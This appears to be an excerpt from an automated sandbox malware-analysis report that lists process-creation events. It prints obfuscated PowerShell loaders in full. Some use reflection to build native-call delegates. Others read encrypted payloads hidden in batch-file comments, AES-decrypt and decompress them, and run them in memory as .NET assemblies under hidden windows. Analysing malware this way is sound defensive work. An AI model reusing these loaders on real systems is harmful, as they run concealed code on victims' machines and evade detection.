Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](10
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kveHNQwSSGcg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mhKVIvEXzPrIho,[Parameter(Position=1)][Type]$QOutAUbbtF)$MsesbhAsMah=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'dul'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+'o'+'C'+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MsesbhAsMah.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mhKVIvEXzPrIho).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$MsesbhAsMah.DefineMethod(''+[Char](73)+'nv'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+'eB'+'y'+'S'+'i'+'g'+','+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QOutAUbbtF,$mhKVIvEXzPrIho).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+'d');Write-Output $MsesbhAsMah.CreateType();}$gFfWslPcsIxEF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+'i'+'n'+'32.'+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$xRDavNIGnzLLon=$gFfWslPcsIxEF.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Cha
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YrWHxoHyNMxl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJbpaFOyxDMlLp,[Parameter(Position=1)][Type]$mBxcLwMzji)$qsXeIcuzIEU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+','+[Char](65)+''+'n'+'siC'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qsXeIcuzIEU.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,H'+'i'+''+'d'+'e'+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsXeIcuzIEU.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+'r'+'t'+[Char](117)+'a'+[Char](108)+'',$mBxcLwMzji,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $qsXeIcuzIEU.CreateType();}$XabpoaxiZGEGR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n32'+[Char](46)+'Uns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ONnlOWkAfaUoGE=$XabpoaxiZGEGR.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Cha
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NyGuwfckeOJe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kiyDauQzMkkpvQ,[Parameter(Position=1)][Type]$OzRVWwEZvx)$JcZRwmspQGK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+'s,P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+'a'+'le'+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+'t'+'o'+[Char](67)+''+'l'+''+'a'+'ss',[MulticastDelegate]);$JcZRwmspQGK.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kiyDauQzMkkpvQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JcZRwmspQGK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OzRVWwEZvx,$kiyDauQzMkkpvQ).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $JcZRwmspQGK.CreateType();}$fMzQsfZpmgSNo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+'a'+''+'f'+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$kCZXEMoRMGVaoJ=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[
Suspicious command line found
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Source: unknown Process created: cmd.exe /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: unknown Process created: "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: unknown Process created: "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju 